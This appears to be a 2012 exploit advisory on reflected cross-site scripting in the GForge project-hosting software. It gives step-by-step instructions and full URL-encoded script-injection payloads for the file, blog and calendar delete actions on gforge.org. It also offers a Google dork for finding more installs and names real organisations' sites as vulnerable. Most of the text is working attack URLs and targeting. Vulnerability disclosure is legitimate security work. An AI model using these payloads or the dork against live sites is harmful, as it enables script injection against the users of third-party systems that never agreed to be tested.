Gforge.org suffers from multiple cross site scripting vulnerabilities.
279b2c178e7b00319918db7557e39bdfd4d565690af7fe6af6e58a1d007d5819
# Exploit Title: GForge Cross Site Scripting
# Date: 30.01.2012
# Author: Sony
# Software Link: http://gforge.org
# Google Dorks: inurl:gf/user/ site:edu (gov,com,org,etc..) or another
dorks (it's simple)
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/01/gforge-cross-site-scripting.html
..................................................................
Well, we have interesting xss in the GForge.
But we can test it on our accounts. We can made 2 accounts for test.
XSS found in the files,calendar,messagewall (search users), blogs..
Files.
Upload our file.
http://gforge.org/gf/user/eleo/userfiles/
And press button delete and open link in the new window and add in the url
our xss.
http://gforge.org/gf/user/eleo/userfiles/my/admin/?action=UserfileDelete&file_id=3089[ourxss
is here]
http://gforge.org/gf/user/eleo/userfiles/my/admin/?action=UserfileDelete&file_id=3089%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://1.bp.blogspot.com/-ob_5W9q6IOE/TybK50KNkHI/AAAAAAAAAU4/zcX5uwx-FDs/s1600/1234.JPG
Test this on your account name.
Well, now..blog.
Create post and press button delete and open link in the new window and add
in the url our xss.
gf/user/eleo/userblog/my/admin/?action=UserblogDelete&id=2[xss is here]
http://gforge.org/gf/user/eleo/userblog/my/admin/?action=UserblogDelete&id=2%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://1.bp.blogspot.com/-blGd0pC1uac/TybNH5m1LRI/AAAAAAAAAVE/X1_7uZTxpJ8/s1600/123454.JPG
or..
http://3.bp.blogspot.com/-QIqH6m6an2E/TybNMwaLUxI/AAAAAAAAAVQ/o439BgL8W2w/s1600/1234556.JPG
Calendar..
Open calendar and press button "add new event" and ress button delete and
open link in the new window and add in the url our xss.
http://gforge.org/gf/user/eleo/usercalendar/my/?action=UsercalendarEventDelete&event_id=6&redirect_to=monthview&start_date=1327881600[ourxss
is here]
http://gforge.org/gf/user/eleo/usercalendar/my/?action=UsercalendarEventDelete&event_id=6&redirect_to=monthview&start_date=1327881600%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://4.bp.blogspot.com/-l2PehXdxhPY/TybOC9eI8bI/AAAAAAAAAVc/dQfmhxCLy1o/s1600/calendar.JPG
And we have xss in the gf/my/messagewall/ (search users)
http://2.bp.blogspot.com/-7snLqFJ--f0/TybPLb9Un-I/AAAAAAAAAVo/f-z-jsdO1ns/s1600/search_user.JPG
http://3.bp.blogspot.com/-zNZi2myMDLc/TybPOlJUqfI/AAAAAAAAAV0/MTFCewGtziU/s1600/search_users2.JPG
Also we can see in google that a lot of sites have a gforge and vulnerable
to xss.
Joomlacode.org
http://2.bp.blogspot.com/-BbfJ7fJ20EI/TybQT5U2fYI/AAAAAAAAAWA/RYMoX_VQZUk/s1600/123.JPG
Stanford.edu
http://3.bp.blogspot.com/-neXykFEhP18/TybQeg0kScI/AAAAAAAAAWM/Wfpn7wAc0OQ/s1600/stan.JPG
http://2.bp.blogspot.com/-7Zwn9dCa_Ms/TybQjpYnq6I/AAAAAAAAAWY/1ZxT_pDJXzE/s1600/stan2.JPG
https://code.ros.org/gf/account/?action=UserAdd
https://forge.si.umich.edu/gf/account/?action=UserAdd
http://media.lbl.gov/gf/account/?action=UserAdd
etc..
It's not a critical vulnerability, but it's possible to use if to change
url for different users.